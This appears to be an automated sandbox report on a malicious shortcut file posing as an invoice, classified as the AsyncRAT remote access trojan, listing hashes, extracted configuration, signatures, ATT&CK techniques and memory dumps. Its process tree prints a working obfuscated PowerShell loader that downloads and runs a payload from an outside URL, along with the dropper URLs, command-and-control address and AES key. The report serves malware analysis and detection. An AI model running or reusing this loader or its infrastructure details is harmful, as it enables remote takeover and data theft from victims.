Overview

overview

10

Static

static

Invoice#333210.lnk

windows7_x64

10

Invoice#333210.lnk

windows10_x64

10

Analysis

  • max time kernel
    35s
  • max time network
    172s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    24-07-2021 11:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Invoice#333210.lnk

  • Size

    1KB

  • MD5

    fd00b923c37b36bfda9a7d78e370f4fc

  • SHA1

    a2f41a4e6f6778b8232054531f58aa083bcc455b

  • SHA256

    9d5eef4b39df0149096f70bde04f9704e0740e93b1f7911d1ad7a79fb7918cf8

  • SHA512

    b010dae295e3b2a25e158ff2b99d22c762d4b0f3fec6d8eb1a64b63946d7b6852254f955d7a377d40b4e77761b7a9017c8e1e0025b618be5eb49dde8834042c9

Score
10/10
asyncratratsuricata

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://ia601405.us.archive.org/29/items/async-rat-stealer-hta-23456789/AsyncRAT_stealer_hta_23456789.txt

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://ia601503.us.archive.org/0/items/asyncRAT_stealer_all_32456789/asyncRAT_stealer_all_32456789.txt

Extracted

Family

asyncrat

Version

0.5.7B

C2

103.147.184.73:7920

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    1DM6U4ipQ53iwuPgxDRkDV4Ly78xKAPF

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    Default

  • host

    103.147.184.73

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    7920

  • version

    0.5.7B

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
    suricata
  • Async RAT payload 3 IoCs
    rat
  • Blocklisted process makes network request 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Invoice#333210.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1088
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "https://ia601405.us.archive.org/29/items/async-rat-stealer-hta-23456789/AsyncRAT_stealer_hta_23456789.txt"
      2⤵
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      PID:1396
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://ia601503.us.archive.org/0/items/asyncRAT_stealer_all_32456789/asyncRAT_stealer_all_32456789.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');
        3⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:732
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:360
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          4⤵
          • Suspicious behavior: AddClipboardFormatListener
          PID:1776

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

2
T1112

Install Root Certificate

1
T1130

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    MD5

    2902de11e30dcc620b184e3bb0f0c1cb

    SHA1

    5d11d14a2558801a2688dc2d6dfad39ac294f222

    SHA256

    e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544

    SHA512

    efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

    Download Submit
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    MD5

    905759c2dff6b15387322dc5176fa25a

    SHA1

    55e333e2fec92427e6d8c7a6a9dfd407e20f7c57

    SHA256

    1c15bb6d44a879c28c5ac618a226d0b8d7365f6c4f48d4e21e0f9297525bed73

    SHA512

    164e3851fc2d8e8a55b2f15ec1dc20e31f9719e6775ac5e6de582fb7fb1adde8d50d0efc72acc7ee7c5702911e83b9bf77c4d67361ef73dbb08883fa8c06e739

    Download Submit
  • memory/360-72-0x0000000000400000-0x0000000000412000-memory.dmp
    Filesize

    72KB

    Download
  • memory/360-83-0x0000000000B80000-0x0000000000B81000-memory.dmp
    Filesize

    4KB

    Download
  • memory/360-82-0x0000000075561000-0x0000000075563000-memory.dmp
    Filesize

    8KB

    Download
  • memory/360-74-0x0000000000400000-0x0000000000412000-memory.dmp
    Filesize

    72KB

    Download
  • memory/360-73-0x000000000040C71E-mapping.dmp
    Download
  • memory/732-70-0x000000001C670000-0x000000001C671000-memory.dmp
    Filesize

    4KB

    Download
  • memory/732-65-0x000000001B350000-0x000000001B351000-memory.dmp
    Filesize

    4KB

    Download
  • memory/732-69-0x000000001B6A0000-0x000000001B6A1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/732-61-0x0000000000000000-mapping.dmp
    Download
  • memory/732-71-0x000000001B3B0000-0x000000001B3BE000-memory.dmp
    Filesize

    56KB

    Download
  • memory/732-67-0x0000000002360000-0x0000000002362000-memory.dmp
    Filesize

    8KB

    Download
  • memory/732-66-0x00000000027C0000-0x00000000027C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/732-68-0x0000000002364000-0x0000000002366000-memory.dmp
    Filesize

    8KB

    Download
  • memory/732-63-0x0000000002680000-0x0000000002681000-memory.dmp
    Filesize

    4KB

    Download
  • memory/732-64-0x000000001A9E0000-0x000000001A9E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1088-59-0x000007FEFB881000-0x000007FEFB883000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1396-60-0x0000000000000000-mapping.dmp
    Download
  • memory/1776-79-0x0000000000400000-0x0000000000408000-memory.dmp
    Filesize

    32KB

    Download
  • memory/1776-81-0x0000000004C90000-0x0000000004C91000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1776-78-0x0000000000402DAE-mapping.dmp
    Download
  • memory/1776-77-0x0000000000400000-0x0000000000408000-memory.dmp
    Filesize

    32KB

    Download